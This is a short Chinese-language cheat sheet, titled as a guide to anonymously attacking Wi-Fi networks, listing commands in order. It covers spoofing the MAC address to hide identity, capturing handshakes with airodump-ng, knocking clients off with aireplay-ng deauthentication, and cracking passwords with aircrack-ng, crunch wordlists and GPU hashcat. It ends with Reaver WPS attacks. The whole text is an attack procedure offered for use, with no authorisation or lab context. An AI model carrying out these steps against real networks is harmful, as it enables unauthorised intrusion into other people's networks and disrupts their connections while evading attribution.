匿名攻击wifi网络
- iwconfig查看网卡信息
- ifconfig wlan0(网卡名称) down 停用网卡
- macchanger wlan0 -r 随机mac地址 / ifconfig wlan0 hw ether xx:xx:xx:xx:xx:xx 指定mac地址
- ifconfig wlan0 up 启用网卡
- airmon-ng start wlan0 启用无线接口
- airodump-ng wlan0mon(以后的网卡都已wlan0mon命名使用)监控附近网络
- airodump-ng -c(通道数) 6 wlan0mon 过滤通道数未6的网络
- airodump-ng --bssid(mac地址) -c(通道数) --showack -w(保存名称) wlan0mon
- aireplay-ng -0 100 -a (路由mac地址) -c (用户mac地址) wlan0mon
- aircrack-ng -w (password.txt) -b (BSSID) (xxx.cap) 对抓取到的cap包进行暴力破解(如果你没有字典,请看下一条)
- crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 生成一个最小为8最大为8的字典
从第10条开始,如果你觉得速度较慢,可以使用GPU进行破解
GPU破解步骤
- aircrack-ng xxx.cap -J (输出文件名称)将cap文件转换为hashcat文件
- cuda Hashcat-plus32.bin -m 2500 xxx.hccap 选择匹配你的cpu架构和图形卡的hashcat版本
没有cuda命令因为没有安装响应库,运行sudo apt-get install nvidia-cuda-toolkit安装
对于那些WPA网络,可以使用Reaver攻击
Reaver攻击
- wash -i wlan0mon --ignore-fcs 识别网络中漏洞
- reaver -i wlan0mon -b (BBSID) -vv 破解目标网络
|